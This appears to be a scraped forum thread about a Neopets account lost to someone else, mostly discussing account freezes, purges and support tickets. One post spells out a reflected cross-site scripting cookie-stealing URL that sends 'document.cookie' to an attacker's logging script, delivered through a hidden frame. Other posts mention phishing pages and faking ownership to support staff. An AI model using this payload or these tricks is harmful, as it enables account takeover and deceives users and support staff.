Page 2 of 2 FirstFirst 12

Thread: How did someone get into my account?

Thanks
    DL/UL
    44/1
    Mentioned
    562 times
    Time Online
    118d 6h 45m
    Avg. Time Online
    40m
    Quote Originally Posted by babytroop123456 View Post
    its really easy to use the cookies to grab a person's account, i think. works on difefrernt sites pretty easily
    Cookie grabbing just needs a URL that when u change the post parameter
    It also changes the reply HTML.

Say you have a url that says
    /file.php?action=spinslot&spinid=33

Say We visit the above link and the HTML contents are like this:

Spinid:33-result:win

Now we change spinid to some JavaScript that prints the cookie so the URL is:

/file.php?action=spinslot&spinid=http://www.oursite.com/logs riot.php?cookie=<script>document.write(document.co okie)</script>

Now when the page loads the users cookie is passed to our php script , we log and that's that.

Then you would just send someone a link to a site with a hidden frame that loads your hacked neopets URL. When the use visits ur link if they are logged into neopets u get there cookie.
    Last edited by DarkByte; 01-30-2013 at 05:36 PM.

Userbars
    Thanks
    Mentioned
    1,368 times
    Time Online
    131d 12h 4m
    Avg. Time Online
    45m
    Even if your account and pet had reason to be returned, it's too late now. 90% probability it's been purged.

TNT typically states they cannot retrieve accounts frozen for older a year, but many are skeptical that TNT are just full of shit, since sometimes they say the same thing after 7 months, while other times you have your account returned to you in 1.5 years. But 3 years is almost complete certainty it's gone.

Userbars
    Thanks
    DL/UL
    23/0
    Mentioned
    9 times
    Time Online
    17d 20h 27m
    Avg. Time Online
    6m
    Quote Originally Posted by Mod View Post
    Even if your account and pet had reason to be returned, it's too late now. 90% probability it's been purged.

TNT typically states they cannot retrieve accounts frozen for older a year, but many are skeptical that TNT are just full of shit, since sometimes they say the same thing after 7 months, while other times you have your account returned to you in 1.5 years. But 3 years is almost complete certainty it's gone.
    Ughh really? When I go to transfer pets with them, it still shows all of their pets so does that mean it's not purged? I'm not sure of the signs of purging
    Back when I had the chance to try and get the account, I never thought of it because the account is probably flagged for scamming or something, and I didn't know any of the info etc etc
    I guess there's no other way than sending a ticket to get into a frozen account huh
    Not to mention, along with my krawk, this person has badass pets... UC mara gelert with a RW name, UC plushie poogle VWN, and a 4L RW
    *cry*

Do you know how long TNT holds old tickets for?? Because I obviously got the account frozen with a ticket, but could I fake them into believing I'm the owner considering I know what account the krawk came from? ugh lol

And yeah I'd agree that they're full of shit. If the account is still on the site, in their databases, isn't it able to be recovered? Just seems like a safety measure to me :/

---------- Post added at 08:05 PM ---------- Previous post was at 08:02 PM ----------

Quote Originally Posted by raredaredevil View Post
    Then you would just send someone a link to a site with a hidden frame that loads your hacked neopets URL. When the use visits ur link if they are logged into neopets u get there cookie.
    Oh ok!! That's really interesting actually. I wish I knew how to do that back in the day, lol. I guess there's still ways to get people from neopets to use fake login pages though huh

Userbars
    Thanks
    Mentioned
    1,368 times
    Time Online
    131d 12h 4m
    Avg. Time Online
    45m
    Quote Originally Posted by moonrash View Post
    When I go to transfer pets with them, it still shows all of their pets so does that mean it's not purged?

Do you know how long TNT holds old tickets for?? Because I obviously got the account frozen with a ticket, but could I fake them into believing I'm the owner considering I know what account the krawk came from? ugh lol
    If you can still search your pet, there is the possibility of it still existing. But once a timed purge begins, pets are slated for deletion based on inactivity, in alphabetical queue. I don't know the mechanics myself, but your pet may be in limbo (or not).

TNT holds onto tickets as long as the account exists, even if frozen. The tickets are permanently and automatically bound to an account history, unless of course, the account itself is purged.

Userbars
    Thanks
    DL/UL
    23/0
    Mentioned
    9 times
    Time Online
    17d 20h 27m
    Avg. Time Online
    6m
    Quote Originally Posted by Mod View Post
    If you can still search your pet, there is the possibility of it still existing. But once a timed purge begins, pets are slated for deletion based on inactivity, in alphabetical queue. I don't know the mechanics myself, but your pet may be in limbo (or not).

TNT holds onto tickets as long as the account exists, even if frozen. The tickets are permanently and automatically bound to an account history, unless of course, the account itself is purged.
    Dammit lol.. just my luck u_u I guess I shouldn't even try then lol..